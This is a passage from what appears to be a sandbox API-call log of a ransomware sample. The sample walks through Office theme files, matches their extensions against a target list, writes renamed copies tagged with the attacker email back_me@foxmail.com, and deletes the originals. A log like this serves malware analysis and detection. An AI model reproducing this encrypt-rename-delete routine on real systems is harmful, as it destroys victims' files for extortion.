shared\\themes14\\cascade\\preview.gif")) returned 1 [0046.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.918] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.918] lstrlenW (lpString=".doc") returned 4 [0046.918] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.918] lstrlenW (lpString=".docx") returned 5 [0046.918] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.918] lstrlenW (lpString=".pdf") returned 4 [0046.918] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.918] lstrlenW (lpString=".xls") returned 4 [0046.918] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.919] lstrlenW (lpString=".xlsx") returned 5 [0046.919] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.919] lstrlenW (lpString=".ppt") returned 4 [0046.919] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.919] lstrlenW (lpString=".zip") returned 4 [0046.919] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.919] lstrlenW (lpString=".rar") returned 4 [0046.919] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.919] lstrlenW (lpString=".bz2") returned 4 [0046.919] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.919] lstrlenW (lpString=".7z") returned 3 [0046.919] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.919] lstrlenW (lpString=".dbf") returned 4 [0046.919] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.919] lstrlenW (lpString=".1cd") returned 4 [0046.919] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.919] lstrlenW (lpString=".jpg") returned 4 [0046.919] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.919] lstrlenW (lpString=".doc") returned 4 [0046.919] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.919] lstrlenW (lpString=".docx") returned 5 [0046.919] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.919] lstrlenW (lpString=".pdf") returned 4 [0046.919] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.919] lstrlenW (lpString=".xls") returned 4 [0046.919] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.920] lstrlenW (lpString=".xlsx") returned 5 [0046.920] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.920] lstrlenW (lpString=".ppt") returned 4 [0046.920] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.920] lstrlenW (lpString=".zip") returned 4 [0046.920] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.920] lstrlenW (lpString=".rar") returned 4 [0046.920] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.920] lstrlenW (lpString=".bz2") returned 4 [0046.920] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.920] lstrlenW (lpString=".7z") returned 3 [0046.920] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.920] lstrlenW (lpString=".dbf") returned 4 [0046.920] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.920] lstrlenW (lpString=".1cd") returned 4 [0046.920] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0046.920] lstrlenW (lpString=".jpg") returned 4 [0046.920] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.920] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.920] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.920] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.921] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1347) returned 1 [0046.921] CloseHandle (hObject=0x194) returned 1 [0046.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 0x20 [0046.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.922] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.922] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.923] GetLastError () returned 0x0 [0046.923] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x543, lpOverlapped=0x0) returned 1 [0046.925] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x550, lpOverlapped=0x0) returned 1 [0046.925] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.926] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.926] SetEndOfFile (hFile=0x1b4) returned 1 [0046.926] CloseHandle (hObject=0x1b4) returned 1 [0046.926] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.926] SetEndOfFile (hFile=0x194) returned 1 [0046.927] CloseHandle (hObject=0x194) returned 1 [0046.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.927] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 1 [0046.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.927] lstrlenW (lpString=".doc") returned 4 [0046.928] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.928] lstrlenW (lpString=".docx") returned 5 [0046.928] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.928] lstrlenW (lpString=".pdf") returned 4 [0046.928] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.928] lstrlenW (lpString=".xls") returned 4 [0046.928] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.928] lstrlenW (lpString=".xlsx") returned 5 [0046.928] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.928] lstrlenW (lpString=".ppt") returned 4 [0046.928] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.928] lstrlenW (lpString=".zip") returned 4 [0046.928] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.928] lstrlenW (lpString=".rar") returned 4 [0046.928] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.928] lstrlenW (lpString=".bz2") returned 4 [0046.928] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.928] lstrlenW (lpString=".7z") returned 3 [0046.928] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.928] lstrlenW (lpString=".dbf") returned 4 [0046.928] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.928] lstrlenW (lpString=".1cd") returned 4 [0046.928] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.928] lstrlenW (lpString=".jpg") returned 4 [0046.928] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.928] lstrlenW (lpString=".doc") returned 4 [0046.928] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.929] lstrlenW (lpString=".docx") returned 5 [0046.929] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.929] lstrlenW (lpString=".pdf") returned 4 [0046.929] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.929] lstrlenW (lpString=".xls") returned 4 [0046.929] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.929] lstrlenW (lpString=".xlsx") returned 5 [0046.929] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.929] lstrlenW (lpString=".ppt") returned 4 [0046.929] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.929] lstrlenW (lpString=".zip") returned 4 [0046.929] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.929] lstrlenW (lpString=".rar") returned 4 [0046.929] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.929] lstrlenW (lpString=".bz2") returned 4 [0046.929] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.929] lstrlenW (lpString=".7z") returned 3 [0046.929] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.929] lstrlenW (lpString=".dbf") returned 4 [0046.929] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.929] lstrlenW (lpString=".1cd") returned 4 [0046.929] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.929] lstrlenW (lpString=".jpg") returned 4 [0046.929] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.929] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.930] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.930] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=32403) returned 1 [0046.930] CloseHandle (hObject=0x194) returned 1 [0046.930] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 0x20 [0046.930] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.930] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.930] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.930] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.931] GetLastError () returned 0x0 [0046.931] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x7e93, lpOverlapped=0x0) returned 1 [0046.939] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x7ea0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x7ea0, lpOverlapped=0x0) returned 1 [0046.941] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.941] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.941] SetEndOfFile (hFile=0x1b4) returned 1 [0046.941] CloseHandle (hObject=0x1b4) returned 1 [0046.942] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.942] SetEndOfFile (hFile=0x194) returned 1 [0046.943] CloseHandle (hObject=0x194) returned 1 [0046.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.943] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 1 [0046.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.943] lstrlenW (lpString=".doc") returned 4 [0046.943] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.943] lstrlenW (lpString=".docx") returned 5 [0046.943] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.943] lstrlenW (lpString=".pdf") returned 4 [0046.943] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.943] lstrlenW (lpString=".xls") returned 4 [0046.943] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.943] lstrlenW (lpString=".xlsx") returned 5 [0046.943] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.944] lstrlenW (lpString=".ppt") returned 4 [0046.944] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.944] lstrlenW (lpString=".zip") returned 4 [0046.944] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.944] lstrlenW (lpString=".rar") returned 4 [0046.944] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.944] lstrlenW (lpString=".bz2") returned 4 [0046.944] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.944] lstrlenW (lpString=".7z") returned 3 [0046.944] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.944] lstrlenW (lpString=".dbf") returned 4 [0046.944] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.944] lstrlenW (lpString=".1cd") returned 4 [0046.944] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.944] lstrlenW (lpString=".jpg") returned 4 [0046.944] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.944] lstrlenW (lpString=".doc") returned 4 [0046.944] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.944] lstrlenW (lpString=".docx") returned 5 [0046.944] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.944] lstrlenW (lpString=".pdf") returned 4 [0046.944] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.944] lstrlenW (lpString=".xls") returned 4 [0046.944] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.944] lstrlenW (lpString=".xlsx") returned 5 [0046.945] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.945] lstrlenW (lpString=".ppt") returned 4 [0046.945] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.945] lstrlenW (lpString=".zip") returned 4 [0046.945] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.945] lstrlenW (lpString=".rar") returned 4 [0046.945] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.945] lstrlenW (lpString=".bz2") returned 4 [0046.945] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.945] lstrlenW (lpString=".7z") returned 3 [0046.945] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.945] lstrlenW (lpString=".dbf") returned 4 [0046.945] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.945] lstrlenW (lpString=".1cd") returned 4 [0046.945] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0046.945] lstrlenW (lpString=".jpg") returned 4 [0046.945] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.945] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.945] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.946] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1347) returned 1 [0046.946] CloseHandle (hObject=0x194) returned 1 [0046.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 0x20 [0046.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.946] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.946] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.946] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.946] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.948] GetLastError () returned 0x0 [0046.948] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x543, lpOverlapped=0x0) returned 1 [0047.036] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x550, lpOverlapped=0x0) returned 1 [0047.037] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.037] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.037] SetEndOfFile (hFile=0x1b4) returned 1 [0047.037] CloseHandle (hObject=0x1b4) returned 1 [0047.037] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.037] SetEndOfFile (hFile=0x194) returned 1 [0047.038] CloseHandle (hObject=0x194) returned 1 [0047.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.038] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) 